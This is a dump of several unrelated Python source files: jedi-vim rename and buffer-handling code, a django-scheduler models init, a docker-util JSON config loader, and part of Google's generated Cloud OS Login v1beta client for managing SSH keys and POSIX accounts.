vim_command('augroup jedi_rename')
vim_command('autocmd InsertLeave <buffer> call jedi#rename(1)')
vim_command('augroup END')
vim_command("let s:jedi_replace_orig = expand('<cword>')")
vim_command('normal! diw')
vim_command("let s:jedi_changedtick = b:changedtick")
vim_command('startinsert')
else:
# Remove autocommand.
vim_command('autocmd! jedi_rename InsertLeave')
# Get replacement, if there is something on the cursor.
# This won't be the case when the user ends insert mode right away,
# and `<cword>` would pick up the nearest word instead.
if vim_eval('getline(".")[getpos(".")[2]-1]') != ' ':
replace = vim_eval("expand('<cword>')")
else:
replace = None
cursor = vim.current.window.cursor
# Undo new word, but only if something was changed, which is not the
# case when ending insert mode right away.
if vim_eval('b:changedtick != s:jedi_changedtick') == '1':
vim_command('normal! u') # Undo new word.
vim_command('normal! u') # Undo diw.
vim.current.window.cursor = cursor
if replace:
return do_rename(replace)
def rename_visual():
replace = vim.eval('input("Rename to: ")')
orig = vim.eval('getline(".")[(getpos("\'<")[2]-1):getpos("\'>")[2]]')
do_rename(replace, orig)
def do_rename(replace, orig=None):
if not len(replace):
echo_highlight('No rename possible without name.')
return
if orig is None:
orig = vim_eval('s:jedi_replace_orig')
# Save original window / tab.
saved_tab = int(vim_eval('tabpagenr()'))
saved_win = int(vim_eval('winnr()'))
temp_rename = goto(mode="related_name", no_output=True)
# Sort the whole thing reverse (positions at the end of the line
# must be first, because they move the stuff before the position).
temp_rename = sorted(temp_rename, reverse=True,
key=lambda x: (x.module_path, x.start_pos))
buffers = set()
for r in temp_rename:
if r.in_builtin_module():
continue
if os.path.abspath(vim.current.buffer.name) != r.module_path:
result = new_buffer(r.module_path)
if not result:
echo_highlight("Jedi-vim: failed to create buffer window for {}!".format(r.module_path))
continue
buffers.add(vim.current.buffer.name)
# Save view.
saved_view = vim_eval('string(winsaveview())')
# Replace original word.
vim.current.window.cursor = r.start_pos
vim_command('normal! c{:d}l{}'.format(len(orig), replace))
# Restore view.
vim_command('call winrestview(%s)' % saved_view)
# Restore previous tab and window.
vim_command('tabnext {:d}'.format(saved_tab))
vim_command('{:d}wincmd w'.format(saved_win))
if len(buffers) > 1:
echo_highlight('Jedi did {:d} renames in {:d} buffers!'.format(
len(temp_rename), len(buffers)))
else:
echo_highlight('Jedi did {:d} renames!'.format(len(temp_rename)))
@_check_jedi_availability(show_error=True)
@catch_and_print_exceptions
def py_import():
# args are the same as for the :edit command
args = shsplit(vim.eval('a:args'))
import_path = args.pop()
text = 'import %s' % import_path
scr = jedi.Script(text, 1, len(text), '')
try:
completion = scr.goto_assignments()[0]
except IndexError:
echo_highlight('Cannot find %s in sys.path!' % import_path)
else:
if completion.in_builtin_module():
echo_highlight('%s is a builtin module.' % import_path)
else:
cmd_args = ' '.join([a.replace(' ', '\\ ') for a in args])
new_buffer(completion.module_path, cmd_args)
@catch_and_print_exceptions
def py_import_completions():
argl = vim.eval('a:argl')
try:
import jedi
except ImportError:
print('Pyimport completion requires jedi module: https://github.com/davidhalter/jedi')
comps = []
else:
text = 'import %s' % argl
script = jedi.Script(text, 1, len(text), '')
comps = ['%s%s' % (argl, c.complete) for c in script.completions()]
vim.command("return '%s'" % '\n'.join(comps))
@catch_and_print_exceptions
def new_buffer(path, options=''):
    # options are additional arguments passed on to the :edit command
if vim_eval('g:jedi#use_tabs_not_buffers') == '1':
_tabnew(path, options)
elif not vim_eval('g:jedi#use_splits_not_buffers') == '1':
user_split_option = vim_eval('g:jedi#use_splits_not_buffers')
split_options = {
'top': 'topleft split',
'left': 'topleft vsplit',
'right': 'botright vsplit',
'bottom': 'botright split',
'winwidth': 'vs'
}
if user_split_option == 'winwidth' and vim.current.window.width <= 2 * int(vim_eval("&textwidth ? &textwidth : 80")):
split_options['winwidth'] = 'sp'
if user_split_option not in split_options:
print('g:jedi#use_splits_not_buffers value is not correct, valid options are: %s' % ','.join(split_options.keys()))
else:
vim_command(split_options[user_split_option] + " %s" % path)
else:
if vim_eval("!&hidden && &modified") == '1':
if vim_eval("bufname('%')") is None:
echo_highlight('Cannot open a new buffer, use `:set hidden` or save your buffer')
return False
else:
vim_command('w')
vim_command('edit %s %s' % (options, escape_file_path(path)))
# sometimes syntax is being disabled and the filetype not set.
if vim_eval('!exists("g:syntax_on")') == '1':
vim_command('syntax enable')
if vim_eval("&filetype != 'python'") == '1':
vim_command('set filetype=python')
return True
@catch_and_print_exceptions
def _tabnew(path, options=''):
"""
Open a file in a new tab or switch to an existing one.
:param options: `:tabnew` options, read vim help.
"""
path = os.path.abspath(path)
if vim_eval('has("gui")') == '1':
vim_command('tab drop %s %s' % (options, escape_file_path(path)))
return
for tab_nr in range(int(vim_eval("tabpagenr('$')"))):
for buf_nr in vim_eval("tabpagebuflist(%i + 1)" % tab_nr):
buf_nr = int(buf_nr) - 1
try:
buf_path = vim.buffers[buf_nr].name
except (LookupError, ValueError):
# Just do good old asking for forgiveness.
# don't know why this happens :-)
pass
else:
if buf_path == path:
# tab exists, just switch to that tab
vim_command('tabfirst | tabnext %i' % (tab_nr + 1))
# Goto the buffer's window.
vim_command('exec bufwinnr(%i) . " wincmd w"' % (buf_nr + 1))
break
else:
continue
break
else:
# tab doesn't exist, add a new one.
vim_command('tabnew %s' % escape_file_path(path))
def escape_file_path(path):
return path.replace(' ', r'\ ')
def print_to_stdout(level, str_out):
print(str_out)
|
GrahamDigital/django-scheduler
|
refs/heads/gd/master
|
schedule/models/__init__.py
|
10
|
from schedule.models.calendars import Calendar, CalendarRelation
from schedule.models.events import *
from schedule.models.rules import *
from schedule.signals import *
|
peitur/docker-util
|
refs/heads/master
|
lib/Controller/config.py
|
1
|
import sys,os, json, re
from pprint import pprint
import util
## make it into a singleton, only want one single store for all instantiations of config
class SingInstance( object ):
__shared = {}
def __init__( self ):
self.__dict__ = self.__shared
class ConfigContent( SingInstance ):
def __init__(self, filename = None, **options ):
super( ConfigContent, self ).__init__()
self.__debug = False
if 'debug' in options and options['debug'] in (True, False):
self.__debug = options['debug']
if filename:
self.__filename = filename
#######################
## variable management in config files.
def __variable_apply( self ):
var_rx = re.compile( r"<\|\s*(.+)\s*\|>" )
varlist = {}
        ## first go through all keys in config to add all string-based basic variables.
        ## Variables depending on variables are still tricky though due to order of key loading.
## Should have made config into list to make sure it's all good at all times..
for item in self.__config:
if util.is_string( self.__config[ item ] ):
if not var_rx.match( self.__config[ item ] ):
varlist[ item ] = self.__config[ item ]
for item in self.__config:
if util.is_string( self.__config[ item ] ):
m = var_rx.match( self.__config[ item ] )
if m:
for v in m.groups( ):
vstr = r"<\|%s\|>" % ( v )
self.__config[ item ] = re.sub( vstr, varlist[ v ], self.__config[ item ] )
varlist[ item ] = self.__config[ item ]
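    ## Illustrative example (editorial, not from this repo): with a config file like
    ##   { "base": "/srv/app", "logdir": "<|base|>/logs" }
    ## __variable_apply() rewrites "logdir" to "/srv/app/logs". As noted above, a
    ## variable has to be a plain string itself before it can be substituted into
    ## later keys.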
#######################
def load_data( self, filename = None ):
if not filename:
filename = self.__filename
data = []
if self.__debug: print("DEBUG: Reading file %(fn)s" % {'fn': filename } )
try:
for line in open( filename, "r"):
data.append( line.rstrip().lstrip() )
except Exception as error:
print("ERROR: Loading config file %s failed : %s" % ( filename, error ) )
if self.__debug: print("DEBUG: Read %(ln)s lines from %(fn)s" % {'ln': len( data ), 'fn': filename } )
if self.__debug:
pprint( data )
self.__config = json.loads( "\n".join( data ) )
self.__variable_apply()
return len( self.__config.keys() )
def env( self, key ):
try:
return os.environ[ key ]
except:
return None
def filename( self ):
return self.__filename
def get( self, key, default = None ):
if key in self.__config:
return self.__config[ key ]
return default
def __hash__( self ):
return {
'filename': self.__filename,
'config': self.__config
}
if __name__ == "__main__":
s1 = ConfigContent( "../../test/samples/config.json" )
s1.load_data()
pprint( s1.__hash__() )
# s2 = ConfigContent()
# s3 = ConfigContent()
# s4 = ConfigContent()
# pprint( s1.filename() )
# pprint( s2.filename() )
# pprint( s3.filename() )
# pprint( s4.filename() )
# pprint( s1.__hash__() )
|
googleapis/googleapis-gen
|
refs/heads/master
|
google/cloud/oslogin/v1beta/oslogin-v1beta-py/google/cloud/oslogin_v1beta/services/os_login_service/client.py
|
1
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.oslogin.common import common_pb2 # type: ignore
from google.cloud.oslogin_v1beta.types import oslogin
from google.protobuf import field_mask_pb2 # type: ignore
from .transports.base import OsLoginServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import OsLoginServiceGrpcTransport
from .transports.grpc_asyncio import OsLoginServiceGrpcAsyncIOTransport
class OsLoginServiceClientMeta(type):
"""Metaclass for the OsLoginService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = OrderedDict() # type: Dict[str, Type[OsLoginServiceTransport]]
_transport_registry["grpc"] = OsLoginServiceGrpcTransport
_transport_registry["grpc_asyncio"] = OsLoginServiceGrpcAsyncIOTransport
def get_transport_class(cls,
label: str = None,
) -> Type[OsLoginServiceTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class OsLoginServiceClient(metaclass=OsLoginServiceClientMeta):
"""Cloud OS Login API
The Cloud OS Login API allows you to manage users and their
associated SSH public keys for logging into virtual machines on
Google Cloud Platform.
"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
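    # Editorial example (not part of the generated client): the conversion turns
    # "oslogin.googleapis.com" into "oslogin.mtls.googleapis.com" and
    # "oslogin.sandbox.googleapis.com" into "oslogin.mtls.sandbox.googleapis.com",
    # while endpoints outside *.googleapis.com are returned unchanged.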
DEFAULT_ENDPOINT = "oslogin.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
OsLoginServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
OsLoginServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> OsLoginServiceTransport:
"""Returns the transport used by the client instance.
Returns:
OsLoginServiceTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def posix_account_path(user: str,project: str,) -> str:
"""Returns a fully-qualified posix_account string."""
return "users/{user}/projects/{project}".format(user=user, project=project, )
@staticmethod
def parse_posix_account_path(path: str) -> Dict[str,str]:
"""Parses a posix_account path into its component segments."""
m = re.match(r"^users/(?P<user>.+?)/projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
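    # Editorial example (not part of the generated client):
    #   OsLoginServiceClient.posix_account_path("alice", "my-project")
    # returns "users/alice/projects/my-project", and parse_posix_account_path()
    # recovers {"user": "alice", "project": "my-project"} from that string.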
@staticmethod
def ssh_public_key_path(user: str,fingerprint: str,) -> str:
"""Returns a fully-qualified ssh_public_key string."""
return "users/{user}/sshPublicKeys/{fingerprint}".format(user=user, fingerprint=fingerprint, )
@staticmethod
def parse_ssh_public_key_path(path: str) -> Dict[str,str]:
"""Parses a ssh_public_key path into its component segments."""
m = re.match(r"^users/(?P<user>.+?)/sshPublicKeys/(?P<fingerprint>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def user_path(user: str,) -> str:
"""Returns a fully-qualified user string."""
return "users/{user}".format(user=user, )
@staticmethod
def parse_user_path(path: str) -> Dict[str,str]:
"""Parses a user path into its component segments."""
m = re.match(r"^users/(?P<user>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str, ) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(billing_account=billing_account, )
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str,str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str, ) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder, )
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str,str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str, ) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization, )
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str,str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str, ) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project, )
@staticmethod
def parse_common_project_path(path: str) -> Dict[str,str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str, ) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(project=project, location=location, )
@staticmethod
def parse_common_location_path(path: str) -> Dict[str,str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(self, *,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, OsLoginServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the os login service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, OsLoginServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")))
client_cert_source_func = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
is_mtls = True
client_cert_source_func = client_options.client_cert_source
else:
is_mtls = mtls.has_default_client_cert_source()
if is_mtls:
client_cert_source_func = mtls.default_client_cert_source()
else:
client_cert_source_func = None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
if is_mtls:
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted "
"values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, OsLoginServiceTransport):
# transport is a OsLoginServiceTransport instance.
if credentials or client_options.credentials_file:
raise ValueError("When providing a transport instance, "
"provide its credentials directly.")
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
)
def delete_posix_account(self,
request: oslogin.DeletePosixAccountRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes a POSIX account.
Args:
request (google.cloud.oslogin_v1beta.types.DeletePosixAccountRequest):
The request object. A request message for deleting a
POSIX account entry.
name (str):
Required. A reference to the POSIX account to update.
POSIX accounts are identified by the project ID they are
associated with. A reference to the POSIX account is in
format ``users/{user}/projects/{project}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a oslogin.DeletePosixAccountRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, oslogin.DeletePosixAccountRequest):
request = oslogin.DeletePosixAccountRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_posix_account]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
("name", request.name),
)),
)
# Send the request.
rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
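    # Editorial usage sketch (the account name is an assumption, not from the
    # generated file):
    #   client = OsLoginServiceClient()
    #   client.delete_posix_account(
    #       name="users/alice@example.com/projects/my-project")
    # Passing the flattened ``name`` argument together with a full ``request``
    # object is rejected, as enforced above.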
def delete_ssh_public_key(self,
request: oslogin.DeleteSshPublicKeyRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes an SSH public key.
Args:
request (google.cloud.oslogin_v1beta.types.DeleteSshPublicKeyRequest):
The request object. A request message for deleting an
SSH public key.
name (str):
Required. The fingerprint of the public key to update.
Public keys are identified by their SHA-256 fingerprint.
The fingerprint of the public key is in format
``users/{user}/sshPublicKeys/{fingerprint}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a oslogin.DeleteSshPublicKeyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, oslogin.DeleteSshPublicKeyRequest):
request = oslogin.DeleteSshPublicKeyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_ssh_public_key]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
("name", request.name),
)),
)
# Send the request.
rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
def get_login_profile(self,
request: oslogin.GetLoginProfileRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> oslogin.LoginProfile:
r"""Retrieves the profile information used for logging in
to a virtual machine on Google Compute Engine.
Args:
request (google.cloud.oslogin_v1beta.types.GetLoginProfileRequest):
The request object. A request message for retrieving the
login profile information for a user.
name (str):
Required. The unique ID for the user in format
``users/{user}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.oslogin_v1beta.types.LoginProfile:
The user profile information used for
logging in to a virtual machine on
Google Compute Engine.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a oslogin.GetLoginProfileRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, oslogin.GetLoginProfileRequest):
request = oslogin.GetLoginProfileRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_login_profile]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
("name", request.name),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def get_ssh_public_key(self,
request: oslogin.GetSshPublicKeyRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> common_pb2.SshPublicKey:
r"""Retrieves an SSH public key.
Args:
request (google.cloud.oslogin_v1beta.types.GetSshPublicKeyRequest):
The request object. A request message for retrieving an
SSH public key.
name (str):
Required. The fingerprint of the public key to retrieve.
Public keys are identified by their SHA-256 fingerprint.
The fingerprint of the public key is in format
``users/{user}/sshPublicKeys/{fingerprint}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.oslogin.common.common_pb2.SshPublicKey:
The SSH public key information
associated with a Google account.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a oslogin.GetSshPublicKeyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, oslogin.GetSshPublicKeyRequest):
request = oslogin.GetSshPublicKeyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_ssh_public_key]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
("name", request.name),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def import_ssh_public_key(self,
request: oslogin.ImportSshPublicKeyRequest = None,
*,
parent: str = None,
ssh_public_key: common_pb2.SshPublicKey = None,
project_id: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> oslogin.ImportSshPublicKeyResponse:
r"""Adds an SSH public key and returns the profile
information. Default POSIX account information is set
when no username and UID exist as part of the login
profile.
Args:
request (google.cloud.oslogin_v1beta.types.ImportSshPublicKeyRequest):
The request object. A request message for importing an
SSH public key.
parent (str):
The unique ID for the user in format ``users/{user}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
ssh_public_key (google.cloud.oslogin.common.common_pb2.SshPublicKey):
Required. The SSH public key and
expiration time.
This corresponds to the ``ssh_public_key`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
project_id (str):
The project ID of the Google Cloud
Platform project.
This corresponds to the ``project_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.oslogin_v1beta.types.ImportSshPublicKeyResponse:
A response message for importing an
SSH public key.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, ssh_public_key, project_id])
if request is not None and has_flattened_params:
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a oslogin.ImportSshPublicKeyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, oslogin.ImportSshPublicKeyRequest):
request = oslogin.ImportSshPublicKeyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if ssh_public_key is not None:
request.ssh_public_key = ssh_public_key
if project_id is not None:
request.project_id = project_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.import_ssh_public_key]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
("parent", request.parent),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def update_ssh_public_key(self,
request: oslogin.UpdateSshPublicKeyRequest = None,
*,
name: str = None,
ssh_public_key: common_pb2.SshPublicKey = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> common_pb2.SshPublicKey:
r"""Updates an SSH public key and returns the profile
information. This method supports patch semantics.
Args:
request (google.cloud.oslogin_v1beta.types.UpdateSshPublicKeyRequest):
The request object. A request message for updating an
SSH public key.
name (str):
Required. The fingerprint of the public key to update.
Public keys are identified by their SHA-256 fingerprint.
The fingerprint of the public key is in format
``users/{user}/sshPublicKeys/{fingerprint}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
ssh_public_key (google.cloud.oslogin.common.common_pb2.SshPublicKey):
Required. The SSH public key and
expiration time.
This corresponds to the ``ssh_public_key`` field
